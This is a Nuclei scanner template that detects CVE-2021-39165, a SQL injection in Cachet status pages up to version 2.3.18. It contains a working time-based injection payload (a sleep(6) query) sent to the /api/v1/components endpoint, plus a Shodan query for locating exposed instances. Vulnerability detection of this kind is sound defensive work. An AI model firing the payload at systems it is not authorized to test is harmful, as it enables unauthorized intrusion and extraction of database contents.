id: CVE-2021-39165 info: name: Cachet <=2.3.18 - SQL Injection author: tess severity: medium description: | Cachet is an open source status page. With Cachet prior to and including 2.3.18, there is a SQL injection which is in the `SearchableTrait#scopeSearch()`. Attackers without authentication can utilize this vulnerability to exfiltrate sensitive data from the database such as administrator's password and session. The original repository of Cachet is not active, the stable version 2.3.18 and it's developing 2.4 branch is affected. remediation: | Upgrade Cachet to a version higher than 2.3.18 or apply the necessary patches provided by the vendor. reference: - https://www.leavesongs.com/PENETRATION/cachet-from-laravel-sqli-to-bug-bounty.html - https://github.com/fiveai/Cachet/commit/27bca8280419966ba80c6fa283d985ddffa84bb6 - https://github.com/W0rty/CVE-2021-39165/blob/main/exploit.py - https://nvd.nist.gov/vuln/detail/CVE-2021-39165 - https://github.com/fiveai/Cachet/security/advisories/GHSA-79mg-4w23-4fqc classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2021-39165 cwe-id: CWE-287 epss-score: 0.0389 epss-percentile: 0.90944 cpe: cpe:2.3:a:chachethq:cachet:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: chachethq product: cachet shodan-query: http.favicon.hash:-1606065523 tags: cve,cve2021,cachet,sqli http: - method: GET path: - "{{BaseURL}}/api/v1/components?name=1&1%5B0%5D=&1%5B1%5D=a&1%5B2%5D=&1%5B3%5D=or+'a'='a')%20and%20(select%20sleep(6))--" redirects: true max-redirects: 2 matchers: - type: dsl dsl: - 'duration>=6' - 'status_code == 200' - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and # digest: 4a0a00473045022100827eca7ad51858150dff9a83960a1f26e46d28e7f3d1cd5fb421ec6da84b8d18022018f98b9e237393533e103587c168c11a0b4818354a21adee0c357d9593a92e9e:922c64590222798bb761d5b6d8e72950